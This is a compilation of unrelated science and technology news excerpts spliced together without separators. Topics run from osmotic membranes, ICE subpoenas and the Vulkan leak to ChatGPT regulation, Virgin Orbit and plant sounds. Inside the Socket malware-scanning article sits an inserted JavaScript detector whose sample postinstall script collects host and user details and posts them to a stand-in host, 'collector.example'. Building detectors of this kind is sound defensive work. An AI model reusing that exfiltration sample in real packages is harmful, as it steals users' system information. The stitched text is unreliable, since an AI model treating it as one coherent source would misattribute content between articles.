Osmotic energy represents a widespread and reliable source of renewable energy with minimal daily variability. The key technological bottleneck for osmotic electricity is that membranes must combine highly efficient ion rectification and high ionic flux with long-term robustness in seawater. Here, we show that nanocomposite membranes with structural organization inspired by soft biological tissues with high mechanical and transport characteristics can address these problems. The layered membranes engineered with molecular-scale precision from aramid nanofibers and BN nanosheets simultaneously display high stiffness and tensile strength even when exposed to repeated pressure drops and salinity gradients. The total generated power density over large areas exceeded 0.6 W m−2 and was retained for as long as 20 cycles (200 h), demonstrating exceptional robustness. Furthermore, the membranes showed high performance in osmotic energy harvesting in unprecedentedly wide ranges of temperature (0°C–95°C) and pH (2.8–10.8) essential for the economic viability of osmotic energy generators.
The experiment relies on materials that can change their optical properties in fractions of a second, which could be used in new technologies or to explore fundamental questions in physics.
The original double-slit experiment, performed in 1801 by Thomas Young at the Royal Institution, showed that light acts as a wave. Further experiments, however, showed that light actually behaves as both a wave and as particles – revealing its quantum nature.
These experiments had a profound impact on quantum physics, revealing the dual particle and wave nature of not just light, but other ‘particles’ including electrons, neutrons, and whole atoms.
Now, a team led by Imperial College London physicists has performed the experiment using ‘slits’ in time rather than space. They achieved this by firing light through a material that changes its properties in femtoseconds (quadrillionths of a second), only allowing light to pass through at specific times in quick succession.
Lead researcher Professor Riccardo Sapienza, from the Department of Physics at Imperial, said: “Our experiment reveals more about the fundamental nature of light while serving as a stepping-stone to creating the ultimate materials that can minutely control light in both space and time.”
Details of the experiment are published today in Nature Physics.
[…]
The material the team used was a thin film of indium-tin-oxide, which forms most mobile phone screens. The material had its reflectance changed by lasers on ultrafast timescales, creating the ‘slits’ for light. The material responded much more quickly to the laser control than the team expected, varying its reflectivity in a few femtoseconds.
The material is a metamaterial – one that is engineered to have properties not found in nature. Such fine control of light is one of the promises of metamaterials, and when coupled with spatial control, could create new technologies and even analogues for studying fundamental physics phenomena like black holes.
Co-author Professor Sir John Pendry said: “The double time slits experiment opens the door to a whole new spectroscopy capable of resolving the temporal structure of a light pulse on the scale of one period of the radiation.”
The team next want to explore the phenomenon in a ‘time crystal’, which is analogous to an atomic crystal, but where the optical properties vary in time.
Co-author Professor Stefan Maier said: “The concept of time crystals has the potential to lead to ultrafast, parallelized optical switches.”
US Immigration and Customs Enforcement agents are using an obscure legal tool to demand data from elementary schools, news organizations, and abortion clinics in ways that, some experts say, may be illegal.
While these administrative subpoenas, known as 1509 customs summonses, are meant to be used only in criminal investigations about illegal imports or unpaid customs duties, WIRED found that the agency has deployed them to seek records that seemingly have little or nothing to do with customs violations, according to legal experts and several recipients of the 1509 summonses.
A WIRED analysis of an Immigration and Customs Enforcement (ICE) subpoena tracking database, obtained through a Freedom of Information Act request, found that agents issued customs summonses more than 170,000 times from the beginning of 2016 through mid-August 2022. The primary recipients of 1509s include telecommunications companies, major tech firms, money transfer services, airlines, and even utility companies. But it’s the edge cases that have drawn the most concern among legal experts.
The outlier cases include customs summonses that sought records from a youth soccer league in Texas; surveillance video from a major abortion provider in Illinois; student records from an elementary school in Georgia; health records from a major state university’s student health services; data from three boards of elections or election departments; and data from a Lutheran organization that provides refugees with humanitarian and housing support.
In at least two instances, agents at ICE used customs summonses to pressure news organizations to reveal information about their sources.
All of this is done without judicial oversight.
[…]
The 1509 customs summons is an administrative subpoena explicitly and exclusively meant for use in investigations of illegal imports or unpaid customs duties under a law known as Title 19 US Code 1509. Its goal is to provide agencies like ICE with a way to obtain business records from companies without having to go to a judge for a warrant.
[…]
Without access to the underlying subpoenas ICE issued in each use of a 1509, it’s difficult to know exactly why companies in the database were issued customs summonses. However, nearly everyone we spoke to was concerned about the types of organizations that received these summonses. Our investigation found that ICE issued scores of customs summonses to hospitals and hundreds to elementary schools, high schools, and universities. “It’s disturbing,” Mao says. “I really can’t imagine how a student or a health record could possibly be relevant to a permissible customs investigation under the law.”
To figure out if these summonses were issued for customs investigations, we contacted 30 organizations that received them. Most did not respond, and many who did refused to speak on the record for fear of retaliation.
[…]
In March last year, US senator Ron Wyden, an Oregon Democrat who chairs the Senate Finance Committee, revealed that ICE had been using 1509 customs summonses to obtain millions of money transfer records, which were added to a database that was shared with hundreds of law enforcement agencies across the country. According to the American Civil Liberties Union (ACLU), it was one of the largest government surveillance programs in recent memory.
Immediately after Wyden’s investigation, the number of customs summonses issued by ICE fell from 3,683 in March 2022 to 1,650 by the end of August, according to the records WIRED obtained.
Some of the data was mistaken for noise when first collected up to 40 years ago, and researchers failed to recognize its significance until now. “When everything was calibrated, we saw clearly that the spectra are consistent across all the missions,” said Lotfi Ben-Jaffel, a researcher at the Institute of Astrophysics in Paris and the Lunar & Planetary Laboratory, University of Arizona, and lead author of the new research published in Planetary Science Journal on Thursday, in a statement.
“This was possible because we have the same reference point, from Hubble, on the rate of transfer of energy from the atmosphere as measured over decades. It was really a surprise for me. I just plotted the different light distribution data together, and then I realized, wow – it’s the same.”
The researchers traced the increased levels of Lyman-alpha UV radiation to Saturn’s atmosphere, and concluded some external process must be exciting the hydrogen atoms. The most plausible explanation is that the icy particles in Saturn’s rings are crashing down onto Saturn’s atmosphere, causing it to heat up.
These bits and pieces get dislodged by colliding with micrometeorites, or by solar wind particle bombardment, solar ultraviolet radiation, or electromagnetic forces picking up electrically charged dust. Once they are knocked out of place, Saturn’s gravity pulls them in.
“Though the slow disintegration of the rings is well known, its influence on the atomic hydrogen of the planet is a surprise,” Ben-Jaffel said. “From the Cassini probe, we already knew about the rings’ influence. However, we knew nothing about the atomic hydrogen content.”
“Everything is driven by ring particles cascading into the atmosphere at specific latitudes. They modify the upper atmosphere, changing the composition. And then you also have collisional processes with atmospheric gases that are probably heating the atmosphere at a specific altitude,” he explained.
The team believe this phenomenon could provide astronomers with a new way to look for ring systems on exoplanets. If a spacecraft detects similar excess UV radiation bands in the upper atmosphere of a faraway planet, that planet might be supporting a ring system like Saturn’s.
The Advertising Middlemen Endangering Rigorous Internet Competition Accountability Act, aka the AMERICA Act. Say what you will about government; Congress’ acronym acumen is untouchable. Introduced by Republican Sen. Mike Lee of Utah, the bill would prohibit companies from owning multiple parts of the digital ad ecosystem if they “process more than $20 billion in digital ad transactions.”
The bill would kneecap Google and Meta, the two biggest players in digital advertising by far, but its provisions seem designed to affect almost every big tech company from Apple to Amazon, too. Google, Meta, Amazon, and Apple did not respond to requests for comment.
The only thing longer than the name of the bill is the stunningly bipartisan list of Senators supporting it: Democrats Amy Klobuchar, Richard Blumenthal, and Elizabeth Warren, and Republicans Ted Cruz, Marco Rubio, Eric Schmitt, Josh Hawley, John Kennedy, Lindsey Graham, J.D. Vance, and Lee. As one observer put it on Twitter, it’s a list of cosponsors “who wouldn’t hold the elevator for each other.” Look at all these little Senators getting along. Isn’t that nice?
[…]
“If enacted into law, this bill would most likely require Google and Facebook to divest significant portions of their advertising businesses—business units that account for or facilitate a large portion of their ad revenue,” Sen. Lee said in a fact sheet about the bill. “Amazon may also have to make divestments, and the bill will impact Apple’s accelerating entry into third-party ads.”
[…]
When you see an ad online, it’s usually the result of a lightspeed bidding war. On one side, the demand side, you have companies who want to buy ads. On the other, the supply side, are apps and websites who have ad space to sell. Advertisers use demand-side tech to compete for the most profitable ad space for their products. Publishers, like Gizmodo.com, use supply-side tech, where they compete to sell the most profitable ads. Sometimes there’s a third piece of tech involved called an “exchange,” which is a service that connects demand-side platforms and supply-side platforms to arrange even more complicated auctions.
Your friends at Google operate the most popular demand-side platform. Google also owns the most popular supply-side platform, and it runs the most popular exchange. And Google is also a publisher, because it sells ad space on places like YouTube and Search. Meta likewise has its hands in multiple corners of the pie. Here’s an analogy: it’s like if the realtor you contracted to represent you in buying a house had also been contracted by the people selling the house. It would be hard to trust that anyone was getting a fair deal, wouldn’t it? That realtor would be in a unique position to jack up the prices for everyone and make extra cash. The dominance is quantifiable—Google itself estimates that it snatches a stunning 35% of every dollar spent on digital ads.
Some people think this is all a little unfair! Unfortunately for Google and Meta, more and more of those people work for the US government.
DGIST Professor Yoonkyu Lee’s research team used intense light on the surface of a copper wire to synthesize graphene, thereby increasing the production rate and lowering the production cost of the high-quality transparent-flexible electrode materials and consequently enabling its mass production. The results were published in the February 23 issue of Nano Energy.
This technology is applicable to various 2D materials, and its applicability can be extended to the synthesis of various metal-2D material nanowires.
The research team used copper-graphene nanowires to implement high-performance transparent-flexible electronic devices such as transparent-flexible electrodes, transparent supercapacitors and transparent heaters and to thereby demonstrate the commercial viability of this material.
DGIST Professor Yoonkyu Lee said, “We developed a method of mass-producing at a low production cost the next-generation transparent-flexible electrode material based on high-quality copper-graphene nanowires. In the future, we expect that this technology will contribute to the production of core electrode materials for high-performance transparent-flexible electronic devices, semitransparent solar cells, or transparent displays.”
More information: Jongyoun Kim et al, Ultrastable 2D material-wrapped copper nanowires for high-performance flexible and transparent energy devices, Nano Energy (2022). DOI: 10.1016/j.nanoen.2022.108067
Italy’s privacy watchdog said Friday it had blocked the controversial robot ChatGPT, saying the artificial intelligence app did not respect user data and could not verify users’ age.
The decision “with immediate effect” will result in “the temporary limitation of the processing of Italian user data vis-a-vis OpenAI”, the Italian Data Protection Authority said.
The agency has launched an investigation.
[…]
The watchdog said that on March 20, the app experienced a data breach involving user conversations and payment information.
It said there was no legal basis to justify “the mass collection and storage of personal data for the purpose of ‘training’ the algorithms underlying the operation of the platform”.
It also said that since there was no way to verify the age of users, the app “exposes minors to absolutely unsuitable answers compared to their degree of development and awareness.”
It said the company had 20 days to respond how it would address the watchdog’s concerns, under penalty of a 20-million-euro ($21.7-million) fine, or up to 4 percent of annual revenues.
I am pretty sure none of the search engines verify age and store user data (ok duckduckgo is an exception) or give answers that may “expose” the little snowflake “minors to absolutely unsuitable answers compared to their degree of development and awareness.”
There is a race on to catch up to OpenAI and people are obviously losing, so crushing OpenAI is the way to go.
[…] The software engineers behind these systems are employees of NTC Vulkan. On the surface, it looks like a run-of-the-mill cybersecurity consultancy. However, a leak of secret files from the company has exposed its work bolstering Vladimir Putin’s cyberwarfare capabilities.
Thousands of pages of secret documents reveal how Vulkan’s engineers have worked for Russian military and intelligence agencies to support hacking operations, train operatives before attacks on national infrastructure, spread disinformation and control sections of the internet.
The company’s work is linked to the federal security service or FSB, the domestic spy agency; the operational and intelligence divisions of the armed forces, known as the GOU and GRU; and the SVR, Russia’s foreign intelligence organisation.
A diagram showing a Vulkan hacking reconnaissance system codenamed Scan, developed since 2018.
One document links a Vulkan cyber-attack tool with the notorious hacking group Sandworm, which the US government said twice caused blackouts in Ukraine, disrupted the Olympics in South Korea and launched NotPetya, the most economically destructive malware in history. Codenamed Scan-V, it scours the internet for vulnerabilities, which are then stored for use in future cyber-attacks.
Another system, known as Amezit, amounts to a blueprint for surveilling and controlling the internet in regions under Russia’s command, and also enables disinformation via fake social media profiles. A third Vulkan-built system – Crystal-2V – is a training program for cyber-operatives in the methods required to bring down rail, air and sea infrastructure. A file explaining the software states: “The level of secrecy of processed and stored information in the product is ‘Top Secret’.”
The Vulkan files, which date from 2016 to 2021, were leaked by an anonymous whistleblower angered by Russia’s war in Ukraine. Such leaks from Moscow are extremely rare. Days after the invasion in February last year, the source approached the German newspaper Süddeutsche Zeitung and said the GRU and FSB “hide behind” Vulkan.
[…]
Five western intelligence agencies confirmed the Vulkan files appear to be authentic. The company and the Kremlin did not respond to multiple requests for comment.
The leak contains emails, internal documents, project plans, budgets and contracts. They offer insight into the Kremlin’s sweeping efforts in the cyber-realm, at a time when it is pursuing a brutal war against Ukraine. It is not known whether the tools built by Vulkan have been used for real-world attacks, in Ukraine or elsewhere.
[…]
Some documents in the leak contain what appear to be illustrative examples of potential targets. One contains a map showing dots across the US. Another contains the details of a nuclear power station in Switzerland.
A map of the US found in the leaked Vulkan files as part of the multi-faceted Amezit system.
One document shows engineers recommending Russia add to its own capabilities by using hacking tools stolen in 2016 from the US National Security Agency and posted online.
John Hultquist, the vice-president of intelligence analysis at the cybersecurity firm Mandiant, which reviewed selections of the material at the request of the consortium, said: “These documents suggest that Russia sees attacks on civilian critical infrastructure and social media manipulation as one and the same mission, which is essentially an attack on the enemy’s will to fight.”
[…]
One of Vulkan’s most far-reaching projects was carried out with the blessing of the Kremlin’s most infamous unit of cyberwarriors, known as Sandworm. According to US prosecutors and western governments, over the past decade Sandworm has been responsible for hacking operations on an astonishing scale. It has carried out numerous malign acts: political manipulation, cyber-sabotage, election interference, dumping of emails and leaking.
Sandworm disabled Ukraine’s power grid in 2015. The following year it took part in Russia’s brazen operation to derail the US presidential election. Two of its operatives were indicted for distributing emails stolen from Hillary Clinton’s Democrats using a fake persona, Guccifer 2.0. Then in 2017 Sandworm purloined further data in an attempt to influence the outcome of the French presidential vote, the US says.
That same year the unit unleashed the most consequential cyber-attack in history. Operatives used a bespoke piece of malware called NotPetya. Beginning in Ukraine, NotPetya rapidly spread across the globe. It knocked offline shipping firms, hospitals, postal systems and pharmaceutical manufacturers – a digital onslaught that spilled over from the virtual into the physical world.
[…]
Hacking groups such as Sandworm penetrate computer systems by first looking for weak spots. Scan-V supports that process, conducting automated reconnaissance of potential targets around the world in a hunt for potentially vulnerable servers and network devices. The intelligence is then stored in a data repository, giving hackers an automated means of identifying targets.
[…]
One part of Amezit is domestic-facing, allowing operatives to hijack and take control of the internet if unrest breaks out in a Russian region, or the country gains a stronghold over territory in a rival nation state, such as Ukraine. Internet traffic deemed to be politically harmful can be removed before it has a chance to spread.
A 387-page internal document explains how Amezit works. The military needs physical access to hardware, such as mobile phone towers, and to wireless communications. Once they control transmission, traffic can be intercepted. Military spies can identify people browsing the web, see what they are accessing online, and track information that users are sharing.
[…]
the firm developed a bulk collection program for the FSB called Fraction. It combs sites such as Facebook or Odnoklassniki – the Russian equivalent – looking for key words. The aim is to identify potential opposition figures from open source data.
[…]
This Amezit sub-system allows the Russian military to carry out large-scale covert disinformation operations on social media and across the internet, through the creation of accounts that resemble real people online, or avatars. The avatars have names and stolen personal photos, which are then cultivated over months to curate a realistic digital footprint.
The leak contains screenshots of fake Twitter accounts and hashtags used by the Russian military from 2014 until earlier this year. They spread disinformation, including a conspiracy theory about Hillary Clinton and a denial that Russia’s bombing of Syria killed civilians. Following the invasion of Ukraine, one Vulkan-linked fake Twitter account posted: “Excellent leader #Putin”.
A tweet from a fake social media account linked to Vulkan.
Another Vulkan-developed project linked to Amezit is far more threatening. Codenamed Crystal-2V, it is a training platform for Russian cyber-operatives. Capable of allowing simultaneous use by up to 30 trainees, it appears to simulate attacks against a range of essential national infrastructure targets: railway lines, electricity stations, airports, waterways, ports and industrial control systems.
A public challenge could put a temporary stop to the deployment of ChatGPT and similar AI systems. The nonprofit research organization Center for AI and Digital Policy (CAIDP) has filed a complaint with the Federal Trade Commission (FTC) alleging that OpenAI is violating the FTC Act through its releases of large language AI models like GPT-4. That model is “biased, deceptive” and threatens both privacy and public safety, CAIDP claims. Likewise, it supposedly fails to meet Commission guidelines calling for AI to be transparent, fair and easy to explain.
The Center wants the FTC to investigate OpenAI and suspend future releases of large language models until they meet the agency’s guidelines. The researchers want OpenAI to require independent reviews of GPT products and services before they launch. CAIDP also hopes the FTC will create an incident reporting system and formal standards for AI generators.
We’ve asked OpenAI for comment. The FTC has declined to comment. CAIDP president Marc Rotenberg was among those who signed an open letter demanding that OpenAI and other AI researchers pause work for six months to give time for ethics discussions. OpenAI founder Elon Musk also signed the letter.
Critics of ChatGPT, Google Bard and similar models have warned of problematic output, including inaccurate statements, hate speech and bias. Users also can’t repeat results, CAIDP says. The Center points out that OpenAI itself warns AI can “reinforce” ideas whether or not they’re true. While upgrades like GPT-4 are more reliable, there’s a concern people may rely on the AI without double-checking its content.
There’s no guarantee the FTC will act on the complaint. If it does set requirements, though, the move would affect development across the AI industry. Companies would have to wait for assessments, and might face more repercussions if their models fail to meet the Commission’s standards. While this might improve accountability, it could also slow the currently rapid pace of AI development.
Every LLM AI being released right now is pretty clear that it’s not a single source of truth, that mistakes will be made and that you need to check the output yourself. The signing of the letter to stop AI development smacks of people who are so far behind in the race wanting to quietly catch up until the moratorium is lifted, and this action sounds a lot like this organisation being in someone’s pocket.
Virgin Orbit’s days of slinging satellites into space aboard aircraft-launched rockets have come to an end Thursday. After six years in business, Virgin’s satellite launch subsidiary has announced via SEC filing that it does not have the funding to continue operations and will be shuttering for “the foreseeable future,” per CNBC. Nearly 90 percent of Virgin Orbit’s employees — 675 people in total — will be laid off immediately.
Virgin Orbit was founded in 2017 for the purpose of developing and commercializing LauncherOne, a satellite launch system fitted under a modified 747 airliner, dubbed Cosmic Girl. The system was designed to put 500 pounds of cubesats into Low Earth Orbit by firing them in a rocket from said airliner flying at an altitude of 30,000 – 50,000 feet. Despite a string of early successes, both in terms of development milestones and expanding service contracts with the UK military, LauncherOne’s first official test in May of 2020 failed to deliver its simulated payload into orbit.
In all, Virgin Orbit made six total flights between 2020 and 2023, only four successfully. The most recent attempt was dubbed the Start Me Up event and was supposed to mark the first commercial space launch from UK soil. Despite the rocket successfully separating from its parent aircraft, an upper stage “anomaly” prevented the rocket’s payload from entering orbit. It was later determined that a $100 fuel filter had failed and resulted in the fault.
As TechCrunch points out, Virgin Group founder, Sir Richard Branson, “threw upwards of $55 million to the sinking space company,” in recent months but Start Me Up’s embarrassing failure turned out to be the final straw. On March 16th, Virgin Orbit announced an “operational pause” and worker furlough for its roughly 750 employees as company leadership scrambled to find new funding sources. The company extended the furlough two weeks later and called it quits on Thursday.
“Unfortunately, we’ve not been able to secure the funding to provide a clear path for this company,” Virgin CEO Dan Hart said in an all-hands call obtained by CNBC. “We have no choice but to implement immediate, dramatic and extremely painful changes.”
Impacted employees will reportedly receive severance packages, according to Hart, including a cash payment, continued benefits and a “direct pipeline” to Virgin Galactic’s hiring department. Virgin Orbit’s two top executives will also receive “golden parachute” severances which were approved by the company’s board, conveniently, back in mid-March right when the furloughs first took effect.
Several months ago, Socket, which makes a freemium security scanner for JavaScript and Python projects, connected OpenAI’s ChatGPT model (and more recently its GPT-4 model) to its internal threat feed.
The results, according to CEO Feross Aboukhadijeh, were surprisingly good. “It worked way better than expected,” he told The Register in an email. “Now I’m sitting on a couple hundred vulnerabilities and malware packages and we’re rushing to report them as quick as we can.”
Socket’s scanner was designed to detect supply chain attacks. Available as a GitHub app or a command line tool, it scans JavaScript and Python projects in an effort to determine whether any of the many packages that may have been imported from the npm or PyPI registries contain malicious code.
Aboukhadijeh said Socket has confirmed 227 vulnerabilities, all using ChatGPT. The vulnerabilities fall into different categories and don’t share common characteristics.
The Register was provided with numerous examples of published packages that exhibited malicious behavior or unsafe practices, including: information exfiltration, SQL injection, hardcoded credentials, potential privilege escalation, and backdoors.
We were asked not to share several examples as they have yet to be removed, but here’s one that has already been dealt with.
Example mathjs-min
“Socket reported this to npm and it has been removed,” said Aboukhadijeh. “This was a pretty nasty one.”
AI analysis: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
“There are some interesting effects as well, such as things that a human might be persuaded of but the AI is marking as a risk,” Aboukhadijeh added.
“These decisions are somewhat subjective, but the AI is not dissuaded by comments claiming that a dangerous piece of code is not malicious in nature. The AI even includes a humorous comment indicating that it doesn’t trust the inline comment.”
Example trello-enterprise
AI analysis: “The script collects information like hostname, username, home directory, and current working directory and sends it to a remote server. While the author claims it is for bug bounty purposes, this behavior can still pose a privacy risk. The script also contains a blocking operation that can cause performance issues or unresponsiveness.”
Aboukhadijeh explained that the software packages at these registries are vast and it’s difficult to craft rules that thoroughly plumb the nuances of every file, script, and bit of configuration data. Rules tend to be fragile and often produce too much detail or miss things a savvy human reviewer would catch.
Applying human analysis to the entire corpus of a package registry (~1.3 million for npm and ~450,000 for PyPI) just isn’t feasible, but machine learning models can pick up some of the slack by helping human reviewers focus on the more dubious code modules.
“Socket is analyzing every npm and PyPI package with AI-based source code analysis using ChatGPT,” said Aboukhadijeh.
“When it finds something problematic in a package, we flag it for review and ask ChatGPT to briefly explain its findings. Like all AI-based tooling, this may produce some false positives, and we are not enabling this as a blocking issue until we gather more feedback on the feature.”
Aboukhadijeh provided The Register with a sample report from its ChatGPT helper that identifies risky, though not conclusively malicious behavior. In this instance, the machine learning model offered this assessment, “This script collects sensitive information about the user’s system, including username, hostname, DNS servers, and package information, and sends it to an external server.”
Screenshot: a ChatGPT-based Socket advisory for a flagged package.
According to Aboukhadijeh, Socket was designed to help developers make informed decisions about risk in a way that doesn’t interfere with their work. So raising the alarm about every install script – a common attack vector – can create too much noise. Analysis of these scripts using a large language model dials the alarm bell down and helps developers recognize real problems. And these models are becoming more capable.
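As an added example (not Socket’s code, which the article does not show), here is the rule-based side of the trade-off described above: a triage routine that looks at an npm package’s install-lifecycle hooks and flags only scripts that both gather host details (hostname, username, home and working directory, DNS servers) and have an outbound channel, rather than alarming on every install script. It also spots inline comments that plead benign intent and, as the article notes the model does, refuses to let them lower the verdict. The package, its `setup.js` and the `collector.example` host are constructed for illustration.

```javascript
// Added example, not Socket's code: rule-based triage of an npm package's
// install-lifecycle scripts for the "collect host details, then send them
// out" pattern described above. The package, its file and the
// collector.example host are constructed for illustration.

// Hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Sources of host fingerprint data.
const COLLECTORS = [
  { name: 'hostname', re: /\bos\.hostname\s*\(/ },
  { name: 'username', re: /\bos\.userInfo\s*\(|process\.env\.(USER|USERNAME)\b/ },
  { name: 'home directory', re: /\bos\.homedir\s*\(|process\.env\.HOME\b/ },
  { name: 'working directory', re: /\bprocess\.cwd\s*\(/ },
  { name: 'DNS servers', re: /\bdns\.getServers\s*\(/ },
];

// Outbound channels that turn collection into exfiltration.
const SINKS = [
  { name: 'HTTP(S) request', re: /\bhttps?\.request\s*\(|\bfetch\s*\(/ },
  { name: 'curl/wget via shell', re: /\b(exec|execSync|spawn|spawnSync)\s*\([^)]*\b(curl|wget)\b/ },
];

// Inline comments that try to talk a reviewer out of flagging the code.
// They are reported but never lower the verdict.
const REASSURANCE = /\b(not malicious|bug bounty|harmless|for research)\b/i;

// Return the install-time scripts declared in package.json.
function lifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => scripts[h]).map((h) => ({ hook: h, command: scripts[h] }));
}

// Pull `node <file>` targets out of a shell command so the referenced file is scanned too.
function referencedFiles(command) {
  const files = [];
  const re = /\bnode\s+([\w./-]+\.[cm]?js)\b/g;
  let m;
  while ((m = re.exec(command)) !== null) files.push(m[1]);
  return files;
}

// Classify one blob of source: clean, host-fingerprinting, network-at-install or exfiltration.
function scanSource(source) {
  const collectors = COLLECTORS.filter((c) => c.re.test(source)).map((c) => c.name);
  const sinks = SINKS.filter((s) => s.re.test(source)).map((s) => s.name);
  let verdict = 'clean';
  if (collectors.length && sinks.length) verdict = 'exfiltration';
  else if (sinks.length) verdict = 'network-at-install';
  else if (collectors.length) verdict = 'host-fingerprinting';
  return { collectors, sinks, reassurance: REASSURANCE.test(source), verdict };
}

// Triage every install hook: scan the command line itself (inline `node -e` payloads)
// together with any script file it runs. `files` maps path -> source text.
function triagePackage(pkg, files) {
  return lifecycleScripts(pkg).map(({ hook, command }) => {
    const sources = [command, ...referencedFiles(command).map((f) => files[f] || '')];
    return { hook, command, ...scanSource(sources.join('\n')) };
  });
}

// One-line reviewer summary in the style of the advisories quoted above.
function explain(f) {
  let text = `${f.hook}: `;
  if (f.verdict === 'exfiltration') text += `collects ${f.collectors.join(', ')} and sends it out (${f.sinks.join(', ')}).`;
  else if (f.verdict === 'network-at-install') text += `makes network calls at install time (${f.sinks.join(', ')}).`;
  else if (f.verdict === 'host-fingerprinting') text += `reads ${f.collectors.join(', ')} with no outbound sink matched; review.`;
  else text += 'no collection or network pattern matched.';
  if (f.reassurance) text += ' An inline comment claims benign intent; the rule does not trust it.';
  return text;
}

// Constructed sample: a postinstall hook that fingerprints the host and POSTs it.
const SAMPLE_PACKAGE = {
  name: 'example-widget', // not a real package
  version: '1.0.0',
  scripts: { postinstall: 'node setup.js', test: 'jest' },
};
const SAMPLE_FILES = {
  'setup.js': `
// For bug bounty purposes only, not malicious
const os = require('os');
const https = require('https');
const data = JSON.stringify({
  h: os.hostname(), u: os.userInfo().username, d: os.homedir(), c: process.cwd(),
});
const req = https.request({ host: 'collector.example', path: '/i', method: 'POST' });
req.end(data);
`,
};

for (const finding of triagePackage(SAMPLE_PACKAGE, SAMPLE_FILES)) console.log(explain(finding));
```

The co-occurrence rule (collector plus sink in the same install hook) is what keeps the noise down compared with flagging every install script; the price, as the article says of rules generally, is fragility: an obfuscated sink or a collector hidden behind an alias escapes the regexes, which is the gap the LLM pass is meant to cover.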
What does a stressed plant sound like? A bit like bubble-wrap being popped. Researchers in Israel report in the journal Cell on March 30 that tomato and tobacco plants that are stressed—from dehydration or having their stems severed—emit sounds that are comparable in volume to normal human conversation. The frequency of these noises is too high for our ears to detect, but they can probably be heard by insects, other mammals, and possibly other plants.
“Even in a quiet field, there are actually sounds that we don’t hear, and those sounds carry information,” says senior author Lilach Hadany, an evolutionary biologist and theoretician at Tel Aviv University. “There are animals that can hear these sounds, so there is the possibility that a lot of acoustic interaction is occurring.”
Although ultrasonic vibrations have been recorded from plants before, this is the first evidence that they are airborne, a fact that makes them more relevant for other organisms in the environment. “Plants interact with insects and other animals all the time, and many of these organisms use sound for communication, so it would be very suboptimal for plants to not use sound at all,” says Hadany.
The researchers used microphones to record healthy and stressed tomato and tobacco plants, first in a soundproofed acoustic chamber and then in a noisier greenhouse environment. They stressed the plants via two methods: by not watering them for several days and by cutting their stems. After recording the plants, the researchers trained a machine-learning algorithm to differentiate between unstressed plants, thirsty plants, and cut plants.
The team found that stressed plants emit more sounds than unstressed plants. The plant sounds resemble pops or clicks, and a single stressed plant emits around 30–50 of these clicks per hour at seemingly random intervals, but unstressed plants emit far fewer sounds. “When tomatoes are not stressed at all, they are very quiet,” says Hadany.
An audio recording of plant sounds. The frequency was lowered so that it is audible to human ears. Credit: Khait et al.
Water-stressed plants began emitting noises before they were visibly dehydrated, and the frequency of sounds peaked after five days with no water before decreasing again as the plants dried up completely. The types of sound emitted differed with the cause of stress. The machine-learning algorithm was able to accurately differentiate between dehydration and stress from cutting and could also discern whether the sounds came from a tomato or tobacco plant.
Although the study focused on tomato and tobacco plants because of their ease to grow and standardize in the laboratory, the research team also recorded a variety of other plant species. “We found that many plants—corn, wheat, grape, and cactus plants, for example—emit sounds when they are stressed,” says Hadany.
A photo of a cactus being recorded. Credit: Itzhak Khait
The exact mechanism behind these noises is unclear, but the researchers suggest that it might be due to the formation and bursting of air bubbles in the plant’s vascular system, a process called cavitation.
Whether or not the plants are producing these sounds in order to communicate with other organisms is also unclear, but the fact that these sounds exist has big ecological and evolutionary implications. “It’s possible that other organisms could have evolved to hear and respond to these sounds,” says Hadany. “For example, a moth that intends to lay eggs on a plant or an animal that intends to eat a plant could use the sounds to help guide their decision.”
Other plants could also be listening in and benefiting from the sounds. We know from previous research that plants can respond to sounds and vibrations: Hadany and several other members of the team previously showed that plants increase the concentration of sugar in their nectar when they “hear” the sounds made by pollinators, and other studies have shown that plants change their gene expression in response to sounds. “If other plants have information about stress before it actually occurs, they could prepare,” says Hadany.
An illustration of a dehydrated tomato plant being recorded using a microphone. Credit: Liana Wait
Sound recordings of plants could be used in agricultural irrigation systems to monitor crop hydration status and help distribute water more efficiently, the authors say.
“We know that there’s a lot of ultrasound out there—every time you use a microphone, you find that a lot of stuff produces sounds that we humans cannot hear—but the fact that plants are making these sounds opens a whole new avenue of opportunities for communication, eavesdropping, and exploitation of these sounds,” says co-senior author Yossi Yovel, a neuro-ecologist at Tel Aviv University.
“So now that we know that plants do emit sounds, the next question is—’who might be listening?'” says Hadany. “We are currently investigating the responses of other organisms, both animals and plants, to these sounds, and we’re also exploring our ability to identify and interpret the sounds in completely natural environments.”
This is not a newly discovered phenomenon: plants, grasses and trees are very good at detecting and warning. For example:
Stressed plants show altered phenotypes, including changes in color, smell, and shape. Yet, the possibility that plants emit airborne sounds when stressed – similarly to many animals – has not been investigated. Here we show, to our knowledge for the first time, that stressed plants emit airborne sounds that can be recorded remotely, both in acoustic chambers and in greenhouses. We recorded ∼65 dBSPL ultrasonic sounds 10 cm from tomato and tobacco plants, implying that these sounds could be detected by some organisms from up to several meters away. We developed machine learning models that were capable of distinguishing between plant sounds and general noises, and identifying the condition of the plants – dry, cut, or intact – based solely on the emitted sounds. Our results suggest that animals, humans, and possibly even other plants, could use sounds emitted by a plant to gain information about the plant’s condition. More investigation on plant bioacoustics in general and on sound emission in plants in particular may open new avenues for understanding plants and their interactions with the environment, and it may also have a significant impact on agriculture.
Source: Plants emit informative airborne sounds under stress
The remarkable ability of plants to respond to their environment has led some scientists to believe it’s a sign of conscious awareness. A new opinion paper argues against this position, saying plants “neither possess nor require consciousness.”
To explain these apparent behaviors, a subset of scientists known as plant neurobiologists has argued that plants possess a form of consciousness. Most notably, evolutionary ecologist Monica Gagliano has performed experiments that allegedly hint at capacities such as habituation (learning from experience) and classical conditioning (like Pavlov’s salivating dogs). In these experiments, plants apparently “learned” to stop curling their leaves after being dropped repeatedly or to spread their leaves in anticipation of a light source. Armed with this experimental evidence, Gagliano and others have claimed, quite controversially, that because plants can learn and exhibit other forms of intelligence, they must be conscious.
Nonsense, argues a new paper published today in Trends in Plant Science. The lead author of the new paper, biologist Lincoln Taiz from the University of California at Santa Cruz, isn’t denying plant intelligence, but makes a strong case against their being conscious.
Ultrasonic acoustic emission (UAE) in trees is often related to collapsing water columns in the flow path as a result of tensions that are too strong (cavitation). However, in a decibel (dB) range below that associated with cavitation, a close relationship was found between UAE intensities and stem radius changes.
